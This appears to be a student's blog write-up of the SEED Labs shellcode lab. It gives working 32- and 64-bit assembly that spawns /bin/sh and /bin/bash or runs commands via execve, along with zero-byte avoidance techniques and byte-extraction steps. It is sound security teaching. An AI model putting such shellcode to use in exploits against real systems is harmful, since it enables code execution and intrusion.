Shellcode Development Lab

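Preface

SEED Labs is a collection of hands-on security labs created by Professor Wenliang Du of Syracuse University; each lab teaches security concepts through worked examples. I am not very familiar with vulnerability exploitation, so I decided to work through these labs as introductory practice.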

SEED Labs home page: https://seedsecuritylabs.org/index.html

SEED Labs 2.0 Software Security Labs: https://seedsecuritylabs.org/Labs_20.04/Software/

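Environment Setup

The official setup page, https://seedsecuritylabs.org/labsetup.html, offers two options: a virtual machine or a cloud server.

The virtual machine option is a pre-built VirtualBox image, and a manual walks through the installation.

The cloud option supports AWS, Google Cloud, Azure, DigitalOcean, and Alibaba Cloud, and also comes with a manual: https://github.com/seed-labs/seed-labs/blob/master/manuals/cloud/seedvm-cloud.md

I won't go into the details here; I used the virtual machine environment.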

Shellcode Development Lab

The main goal of this lab is to understand how shellcode works and what to watch out for when writing shellcode for real-world use.

Tasks: https://seedsecuritylabs.org/Labs_20.04/Files/Shellcode/Shellcode.pdf
Lab setup files: https://seedsecuritylabs.org/Labs_20.04/Files/Shellcode/Labsetup.zip

Task 1: Writing Shellcode

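Shellcode is usually written in assembly, so its form depends on the target architecture. That is typically the Intel architecture, which comes in 32-bit (x86) and 64-bit (x64) variants. Most computers today are 64-bit, but they can still run 32-bit programs.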

Task 1.a: The Entire Process

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax 
      push eax          ; Use 0 to terminate the string
      push "//sh"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points "/bin//sh"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

This is the sample shellcode program provided by the lab; running it starts a shell.

Use nasm to assemble the code into a .o object file:

$ nasm -f elf32 mysh.s -o mysh.o

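The object file must then be linked with ld to produce an executable:

$ ld -m elf_i386 mysh.o -o mysh

To verify that mysh really starts a new shell, print the current shell's process ID with echo $$ before and after running it; the two IDs should differ.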

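In an attack we only need to inject the machine code of the attack, not a complete executable file. That machine code is what is called shellcode. Here we can take it straight from mysh.o by disassembling the file with objdump:

$ objdump -Mintel --disassemble mysh.o

The output shows the shellcode bytes next to the corresponding assembly instructions: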

mysh.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	31 c0                	xor    eax,eax
   2:	50                   	push   eax
   3:	68 2f 2f 73 68       	push   0x68732f2f
   8:	68 2f 62 69 6e       	push   0x6e69622f
   d:	89 e3                	mov    ebx,esp
   f:	50                   	push   eax
  10:	53                   	push   ebx
  11:	89 e1                	mov    ecx,esp
  13:	31 d2                	xor    edx,edx
  15:	31 c0                	xor    eax,eax
  17:	b0 0b                	mov    al,0xb
  19:	cd 80                	int    0x80

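This layout is awkward to copy from, so use xxd to print the file contents in hexadecimal instead:

$ xxd -p -c 20 mysh.o

The -p option prints a plain hexdump, and -c 20 prints 20 bytes per line: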

7f454c4601010100000000000000000001000300
0100000000000000000000004000000000000000
3400000000002800050002000000000000000000
0000000000000000000000000000000000000000
0000000000000000000000000000000000000000
0000000001000000010000000600000000000000
100100001b000000000000000000000010000000
0000000007000000030000000000000000000000
3001000021000000000000000000000001000000
0000000011000000020000000000000000000000
6001000040000000040000000300000004000000
1000000019000000030000000000000000000000
a00100000f000000000000000000000001000000
00000000000000000000000031c050682f2f7368
682f62696e89e3505389e131d231c0b00bcd8000
00000000002e74657874002e7368737472746162
002e73796d746162002e73747274616200000000
0000000000000000000000000000000000000000
0000000000000000010000000000000000000000
0400f1ff00000000000000000000000003000100
08000000000000000000000010000100006d7973
682e73005f73746172740000

According to the objdump output, the shellcode starts with 31 c0 and ends with cd 80, so copy just that range out of the hexdump:

31c050682f2f7368
682f62696e89e3505389e131d231c0b00bcd80
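Copying the bytes by hand is error-prone. As a minimal sketch (not part of the lab materials), the Python snippet below pulls the byte column out of an objdump listing like the one above. The function name `bytes_from_objdump` and the regular expression are illustrative assumptions; the sketch expects the tab-separated `offset:<TAB>bytes<TAB>instruction` layout that objdump printed here.

```python
import re

def bytes_from_objdump(listing: str) -> bytes:
    """Collect the machine-code bytes from objdump disassembly lines."""
    out = bytearray()
    for line in listing.splitlines():
        # A disassembly line looks like "   3:<TAB>68 2f 2f 73 68   <TAB>push ..."
        m = re.match(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} )+)", line)
        if m:
            out += bytes.fromhex(m.group(1))  # fromhex ignores the spaces
    return bytes(out)

# The listing from above, with the tab separators written out explicitly.
listing = (
    "00000000 <_start>:\n"
    "   0:\t31 c0                \txor    eax,eax\n"
    "   2:\t50                   \tpush   eax\n"
    "   3:\t68 2f 2f 73 68       \tpush   0x68732f2f\n"
    "   8:\t68 2f 62 69 6e       \tpush   0x6e69622f\n"
    "   d:\t89 e3                \tmov    ebx,esp\n"
    "   f:\t50                   \tpush   eax\n"
    "  10:\t53                   \tpush   ebx\n"
    "  11:\t89 e1                \tmov    ecx,esp\n"
    "  13:\t31 d2                \txor    edx,edx\n"
    "  15:\t31 c0                \txor    eax,eax\n"
    "  17:\tb0 0b                \tmov    al,0xb\n"
    "  19:\tcd 80                \tint    0x80\n"
)

shellcode = bytes_from_objdump(listing)
print(shellcode.hex())
```

The printed hex string should match the two lines copied from the xxd output once they are joined.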

The lab also provides a Python script, convert.py, which converts the shellcode into a form suitable for use in Python.
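The contents of convert.py are not shown in this post, so the following is only a guess at the kind of conversion such a script performs: turning the copied hex text into a Python bytes literal. The helper name `to_escaped` is hypothetical.

```python
def to_escaped(hex_text: str) -> str:
    """Turn hex text (whitespace allowed) into a \\xNN escape sequence string."""
    raw = bytes.fromhex(hex_text)
    return "".join(f"\\x{b:02x}" for b in raw)

# The two hex lines copied from the xxd output, joined with a space.
hex_text = "31c050682f2f7368 682f62696e89e3505389e131d231c0b00bcd80"
escaped = to_escaped(hex_text)

# Print a line that can be pasted into an exploit script.
print(f'shellcode = b"{escaped}"')
```

Pasting the printed line into a Python script yields a bytes object holding the same 27 bytes.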

Task 1.b. Eliminating Zeros from the Code

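Shellcode is mostly used in buffer overflow attacks, where the overflow is usually caused by a string or memory copy. Some string copy functions treat a 0 byte as the end of the string, so if the shellcode contains a 0 it gets truncated: nothing after the 0 is copied, and the shellcode arrives incomplete.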
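The truncation can be illustrated with a small Python sketch. `strcpy_sim` is a hypothetical stand-in that models only the stop-at-first-zero behaviour of a C string copy; the two byte strings are hand-encoded 32-bit instruction sequences and are best double-checked with objdump.

```python
def strcpy_sim(src: bytes) -> bytes:
    """Return the bytes a C-style string copy would transfer (up to the first 0x00)."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]

# mov eax, 0x0b ; int 0x80  -> the 32-bit immediate carries three zero bytes
with_zero = bytes.fromhex("b80b000000" "cd80")
# xor eax, eax ; mov al, 0x0b ; int 0x80  -> same effect, no zero bytes
zero_free = bytes.fromhex("31c0" "b00b" "cd80")

print(strcpy_sim(with_zero).hex())   # only the bytes before the first zero survive
print(strcpy_sim(zero_free).hex())   # copied in full
```

In the first case the int 0x80 instruction never reaches the target buffer, which is why the rest of this task is about rewriting instructions so that no zero byte is encoded.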

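So shellcode must not contain zero bytes. When a zero is genuinely needed, use an alternative instruction sequence that produces it without encoding one. For example:

To set a register to 0, replace mov eax, 0 with xor eax, eax.
Some constants contain hidden zeros. mov eax, 0x99 looks zero-free, but eax is a 32-bit register, so 0x99 is encoded as the 32-bit immediate 0x00000099. Instead, zero eax first and then assign 0x99 to al; al is an 8-bit register, so the immediate is a single byte with no padding.
Shifts also work. The string "xyz" as an integer is 0x007A7978, with a zero in the high byte. Load "xyz#" instead and then shift the # out:
mov ebx, "xyz#"
shl ebx, 8
shr ebx, 8
The left shift by 8 bits discards the #, and the right shift by 8 bits fills the top byte with 0.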
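The shift trick is easy to check numerically. The sketch below emulates the 32-bit register in Python; the helper names `shl32` and `shr32` are made up for this illustration.

```python
MASK32 = 0xFFFFFFFF

def shl32(value: int, count: int) -> int:
    """Logical left shift in a 32-bit register (bits shifted past bit 31 are lost)."""
    return (value << count) & MASK32

def shr32(value: int, count: int) -> int:
    """Logical right shift in a 32-bit register (zeros enter from the top)."""
    return (value & MASK32) >> count

# mov ebx, "xyz#": the first character ends up in the lowest byte
ebx = int.from_bytes(b"xyz#", "little")
print(hex(ebx))            # 0x237a7978

ebx = shl32(ebx, 8)        # shl ebx, 8 drops the '#' byte
print(hex(ebx))            # 0x7a797800

ebx = shr32(ebx, 8)        # shr ebx, 8 brings a zero byte in at the top
print(hex(ebx))            # 0x7a7978

print(ebx.to_bytes(4, "little"))   # b'xyz\x00'
```

The register ends up holding "xyz" followed by a terminating zero, yet no instruction had to encode a zero byte.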

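Task: the sample shellcode pushes the string "/bin//sh" rather than "/bin/sh". Each push in a 32-bit program stores 4 bytes, so the string length has to be a multiple of 4, and /sh was padded to //sh. The task is to run /bin/bash instead, without adding any redundant / and without any zero bytes in the shellcode.

Split /bin/bash into 4-byte chunks and push them in reverse order: h, then /bas, then /bin. The final h is shorter than 4 bytes; pushing it as a 32-bit immediate would pad the upper bytes with zeros, which we must avoid. Instead, zero eax, assign "h" to al, and push eax.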
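The chunking and push order can be worked out mechanically. This is a small sketch with a hypothetical helper, `push_order`, that splits a path into stack-word-sized pieces and reverses them; it also prints the little-endian value each piece has as an immediate.

```python
def push_order(path: bytes, word: int = 4) -> list:
    """Split path into word-sized chunks and return them in push (reverse) order."""
    chunks = [path[i:i + word] for i in range(0, len(path), word)]
    return list(reversed(chunks))

order = push_order(b"/bin/bash")   # [b'h', b'/bas', b'/bin']
for chunk in order:
    value = int.from_bytes(chunk, "little")
    # A chunk shorter than 4 bytes shows leading zeros here, which is the
    # signal that it cannot be pushed as a plain 32-bit immediate.
    print(f"{chunk!r:10} -> 0x{value:08x}")
```

The value printed for "/bin" is 0x6e69622f, the same immediate objdump showed for the sample program, and the value for "h" is 0x00000068, which is why it goes through al instead.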

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax
      push eax          ; Use 0 to terminate the string
      xor eax, eax
      mov al, "h"
      push eax
      xor eax, eax
      push "/bas"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points to "/bin/bash"
      mov  ecx, esp     ; Get the address of argv[]

      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

Task 1.c. Providing Arguments for System Calls

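In C, the prototype of execve is int execve(const char *filename, char *const argv[], char *const envp[]);

The first argument, filename, is a string holding the path of the file to execute. The second, argv[], is an array of pointers, each pointing to one argument string; its last element must be NULL to mark the end of the array. The last, envp[], is the array of environment variables passed to the new program, in the same NULL-terminated form.

Task: use execve to run the following command:

/bin/sh -c "ls -la"

So the argument array has to be built as:

argv[3] = 0
argv[2] = "ls -la"
argv[1] = "-c"
argv[0] = "/bin/sh"

The code is as follows: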

section .text
  global _start
    _start:
      ; Store the argument string on stack
   
      xor eax, eax
      mov ax, "la"
      push eax
      push "ls -"
      mov edx, esp

      xor eax, eax
      mov ax, "-c"
      push eax
      mov ecx, esp

      xor eax, eax
      push eax
      push "//sh"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[3] = 0
      push edx          ; argv[2] points "ls -la"
      push ecx          ; argv[1] points "-c"
      push ebx          ; argv[0] points "/bin//sh"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

Here "-c" and "la" are both 16 bits (two characters) long, so they can be assigned directly to the 16-bit register ax.
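To see why the 16-bit register matters, compare the two encodings. The sketch below hand-encodes the instructions (66 b8 for mov ax, imm16 and b8 for mov eax, imm32 in 32-bit mode); the helper names are hypothetical, and the bytes are worth confirming against objdump output for your own build.

```python
def mov_ax_imm16(text: bytes) -> bytes:
    """Hand-encode `mov ax, imm16`: operand-size prefix 66, opcode b8, 2 bytes."""
    assert len(text) == 2
    return b"\x66\xb8" + text

def mov_eax_imm32(text: bytes) -> bytes:
    """Hand-encode `mov eax, imm32`: opcode b8, 4 bytes (short text is zero-padded)."""
    assert len(text) <= 4
    return b"\xb8" + text.ljust(4, b"\x00")

for text in (b"la", b"-c"):
    short = mov_ax_imm16(text)
    wide = mov_eax_imm32(text)
    print(text, short.hex(), "zero-free:", 0 not in short)
    print(text, wide.hex(), "zero-free:", 0 not in wide)
```

The 16-bit form carries exactly the two characters, while the 32-bit form has to pad them with two zero bytes.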

Task 1.d. Providing Environment Variables for `execve()`

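As noted above, the third argument of execve() carries the environment variables. This task passes some environment variables to execve().

Task: run /usr/bin/env so that it prints the following environment variables: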

$ ./myenv
aaa=1234
bbb=5678
cccc=1234

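First build the env[] array. Each element is a pointer to one environment variable, each variable is a zero-terminated string of the form name=value, and the last element of env[] is 0.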

env[3] = 0
env[2] = address to the "cccc=1234" string
env[1] = address to the "bbb=5678" string
env[0] = address to the "aaa=1234" string

The code is as follows:

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax 
      push eax          ; Use 0 to terminate the string
      xor eax, eax
      mov al, "4"
      push eax
      push "=123"
      push "cccc"
      mov ebx, esp

      xor eax, eax
      push eax
      push "5678"
      push "bbb="
      mov edx, esp
     
      push eax
      push "1234"
      push "aaa="
      mov ecx, esp

      ; For environment variable 
      push eax
      push ebx
      push edx
      push ecx
      mov edx, esp

      push eax
      push "/env"
      push "/bin"
      push "/usr"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points "/usr/bin/env"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80
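One way to check the pointer bookkeeping without running the shellcode is to replay the pushes on a toy stack. The sketch below is an assumption-laden model: the `Stack` class, its method names, and the starting address 0xFFFFD000 are all invented for this illustration. It mirrors the push sequence of the Task 1.d listing and then reads env[] and argv[] back the way execve would.

```python
import struct

class Stack:
    """Toy model of a 32-bit stack that grows downward (addresses are made up)."""

    def __init__(self, top: int = 0xFFFFD000, size: int = 256):
        self.base = top - size
        self.mem = bytearray(size)
        self.esp = top

    def push(self, value) -> int:
        """Push a 4-byte chunk or a 32-bit integer; return the new esp."""
        data = value if isinstance(value, bytes) else struct.pack("<I", value)
        assert len(data) == 4
        self.esp -= 4
        off = self.esp - self.base
        self.mem[off:off + 4] = data
        return self.esp

    def cstring(self, addr: int) -> str:
        """Read a zero-terminated string starting at addr."""
        off = addr - self.base
        end = self.mem.index(0, off)
        return bytes(self.mem[off:end]).decode()

    def pointers(self, addr: int) -> list:
        """Read a NULL-terminated array of 32-bit pointers starting at addr."""
        out = []
        while True:
            (ptr,) = struct.unpack_from("<I", self.mem, addr - self.base)
            if ptr == 0:
                return out
            out.append(ptr)
            addr += 4

s = Stack()
s.push(0)                                   # push eax (terminator)
s.push(b"4\x00\x00\x00")                    # mov al, "4" ; push eax
s.push(b"=123"); ebx = s.push(b"cccc")      # ebx -> "cccc=1234"
s.push(0); s.push(b"5678"); edx = s.push(b"bbb=")   # edx -> "bbb=5678"
s.push(0); s.push(b"1234"); ecx = s.push(b"aaa=")   # ecx -> "aaa=1234"
s.push(0); s.push(ebx); s.push(edx); envp = s.push(ecx)   # env[]
s.push(0); s.push(b"/env"); s.push(b"/bin"); path = s.push(b"/usr")
s.push(0); argv = s.push(path)              # argv[]

print([s.cstring(p) for p in s.pointers(envp)])
print([s.cstring(p) for p in s.pointers(argv)])
```

The first list should come out in the order aaa, bbb, cccc, because the pointers are pushed in reverse so that env[0] sits at the lowest address.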

Task 2: Using Code Segment

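In Task 1 all the data structures are built dynamically on the stack, so every data address is derived from esp.

There is another way to solve the data-address problem: store the data in the code region and obtain its address through the function-call mechanism. A call instruction pushes its return address, which is the address of whatever follows the call, so placing the data right after a call makes that address available with a pop.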

section .text
  global _start
    _start:
        BITS 32               ; tell NASM to generate 32-bit code
        jmp short two         ; jump to the label two
    one:
        pop ebx               ; pop the return address pushed by call: the address of the db data
        xor eax, eax          ; eax = 0
        mov [ebx+7], al       ; write one zero byte at ebx+7, turning '*' into the string terminator
        mov [ebx+8], ebx      ; overwrite AAAA (4 bytes) with the data address: argv[0]
        mov [ebx+12], eax     ; overwrite BBBB (4 bytes) with zeros: argv[1] = NULL
        lea ecx, [ebx+8]      ; ecx = ebx+8, the address of argv[] (where AAAA was)
        xor edx, edx          ; edx = 0: no environment variables

        ; invoke execve()
        mov al,  0x0b
        int 0x80
    two:
        call one              ; push the address of the bytes that follow, then jump to one
        db '/bin/sh*AAAABBBB' ; db defines data one byte at a time

The comments explain what each instruction does.
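The three memory writes can be replayed on a copy of the data to see what execve ends up receiving. This is only a sketch: `patch_sample` is a hypothetical helper, and the address 0x08048080 is an arbitrary stand-in for whatever value pop ebx produces at run time.

```python
import struct

def patch_sample(data: bytes, ebx: int) -> bytes:
    """Apply the three writes from the sample to a copy of the db data."""
    buf = bytearray(data)
    buf[7] = 0                              # mov [ebx+7], al
    buf[8:12] = struct.pack("<I", ebx)      # mov [ebx+8], ebx
    buf[12:16] = struct.pack("<I", 0)       # mov [ebx+12], eax
    return bytes(buf)

EBX = 0x08048080                            # hypothetical run-time address of the data
patched = patch_sample(b"/bin/sh*AAAABBBB", EBX)

print(patched[:8])                          # the filename, now zero-terminated
argv0, argv1 = struct.unpack("<II", patched[8:16])
print(hex(argv0), hex(argv1))               # argv[0] = data address, argv[1] = NULL
print(hex(EBX + 8))                         # value loaded into ecx by lea
```

After patching, the 16 data bytes hold both the filename string and the two-element argv[] array, which is why the placeholders *, AAAA, and BBBB are sized the way they are.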

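Because the data is defined in the code segment and the code modifies it at run time, link with the --omagic option so that the code segment is writable:

$ nasm -f elf32 mysh2.s -o mysh2.o
$ ld --omagic -m elf_i386 mysh2.o -o mysh2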

Task: using the same technique as the sample code above, run /usr/bin/env and print the following environment variables:

a=11
b=22

First, we need to construct the three arguments:

filename = "/usr/bin/env"
argv[] = {"/usr/bin/env", NULL}
env[] = {address to "a=11", address to "b=22", NULL}

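Following the approach in mysh2.s, the data should be defined as db '/usr/bin/env*NNNNDDDDa=11*b=22*AAAABBBBNNNN'

Each * marks a position that will be overwritten with a single 0 byte to terminate a string. The first two 4-byte placeholders form argv[]: in the code below, the first NNNN receives the address of the command string (argv[0]) and DDDD is overwritten with 4 zero bytes (the NULL that ends argv[]). AAAA and BBBB receive the addresses of a=11 and b=22, and the final NNNN is overwritten with 4 zero bytes, the NULL that ends env[].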
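The offsets used with ebx have to match this layout exactly, so it helps to compute them rather than count by hand. A minimal sketch; the `fields` list is simply the template split at the boundaries described above.

```python
template = "/usr/bin/env*NNNNDDDDa=11*b=22*AAAABBBBNNNN"
fields = ["/usr/bin/env", "*", "NNNN", "DDDD",
          "a=11", "*", "b=22", "*",
          "AAAA", "BBBB", "NNNN"]

offsets = []
pos = 0
for field in fields:
    # Make sure the field list really describes the template.
    assert template.startswith(field, pos)
    offsets.append((pos, field))
    pos += len(field)
assert pos == len(template)

for off, field in offsets:
    print(f"ebx+{off:<2} {field}")
```

The printed offsets (12, 13, 17, 21, 25, 26, 30, 31, 35, 39) are the displacements that should appear in the mov and lea instructions.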

The code is as follows:

section .text
  global _start
    _start:
        BITS 32
        jmp short two
    one:
        pop ebx               ; ebx = address of the data (the command string)
        xor eax, eax
        mov [ebx+12], al      ; terminate "/usr/bin/env" with a zero byte
        mov [ebx+13], ebx     ; argv[0] = address of "/usr/bin/env"
        mov [ebx+17], eax     ; argv[1] = 0
        lea ecx, [ebx+13]     ; ecx = argv[]

        mov [ebx+25], al      ; terminate "a=11"
        mov [ebx+30], al      ; terminate "b=22"
        lea edx, [ebx+21]     ; address of "a=11"
        mov [ebx+31], edx     ; env[0]
        lea edx, [ebx+26]     ; address of "b=22"
        mov [ebx+35], edx     ; env[1]
        mov [ebx+39], eax     ; env[2] = 0
        lea edx, [ebx+31]     ; edx = env[]

        mov al,  0x0b         ; execve()
        int 0x80
    two:
        call one
        ; offsets: 0 path, 12 *, 13 NNNN, 17 DDDD, 21 a=11, 25 *, 26 b=22, 30 *, 31 AAAA, 35 BBBB, 39 NNNN
        db '/usr/bin/env*NNNNDDDDa=11*b=22*AAAABBBBNNNN'

Task 3: Writing 64-bit Shellcode

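64-bit shellcode differs from 32-bit shellcode in two main ways: 1) addresses are 8 bytes long and the registers are 64-bit; 2) system calls are made with the syscall instruction, with the first three arguments placed in rdi, rsi, and rdx, in that order, and the system call number in rax (0x3b for execve in the code below).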

section .text
  global _start
    _start:
      ; The following code calls execve("/bin/sh", ...)
      xor  rdx, rdx       ; 3rd argument
      push rdx
      mov rax,'/bin//sh'
      push rax
      mov rdi, rsp        ; 1st argument
      push rdx 
      push rdi
      mov rsi, rsp        ; 2nd argument
      xor  rax, rax
      mov al, 0x3b        ; execve()
      syscall
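The doubled slash in '/bin//sh' serves the same purpose as in the 32-bit version, only now the unit is 8 bytes. The sketch below hand-encodes mov rax, imm64 as 48 b8 followed by the 8 immediate bytes; the helper name is hypothetical and the encoding is best confirmed with objdump on your own object file.

```python
def mov_rax_imm64(text: bytes) -> bytes:
    """Hand-encode `mov rax, imm64`: REX.W prefix 48, opcode b8, 8 immediate bytes."""
    assert len(text) <= 8
    return b"\x48\xb8" + text.ljust(8, b"\x00")

padded = mov_rax_imm64(b"/bin//sh")   # exactly 8 characters
short = mov_rax_imm64(b"/bin/sh")     # 7 characters, so one zero byte of padding

print(padded.hex(), "zero-free:", 0 not in padded)
print(short.hex(), "zero-free:", 0 not in short)
```

With 8 characters the immediate fills the register completely, so no zero byte appears in the instruction.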

The assemble and link commands also need the 64-bit options:

$ nasm -f elf64 mysh_64.s -o mysh_64.o
$ ld mysh_64.o -o mysh_64

Task: as in Task 1.b, make the 64-bit shellcode run /bin/bash, with no redundant / and no zero bytes in the shellcode.

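section .text
  global _start
    _start:
      ; The following code calls execve("/bin/bash", ...)
      xor  rdx, rdx       ; 3rd argument
      xor  rax, rax       ; clear rax so only the low byte is set below
      mov  al, 'h'
      push rax            ; "h" followed by zero bytes, which terminate the string
      mov  rax, '/bin/bas'
      push rax
      mov  rdi, rsp       ; 1st argument

      push rdx            ; argv[1] = 0
      push rdi            ; argv[0] points to "/bin/bash"
      mov  rsi, rsp       ; 2nd argument
      xor  rax, rax
      mov  al, 0x3b       ; execve()
      syscall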

zinc's blog

SEED Labs 2.0 Software Security Lab 1
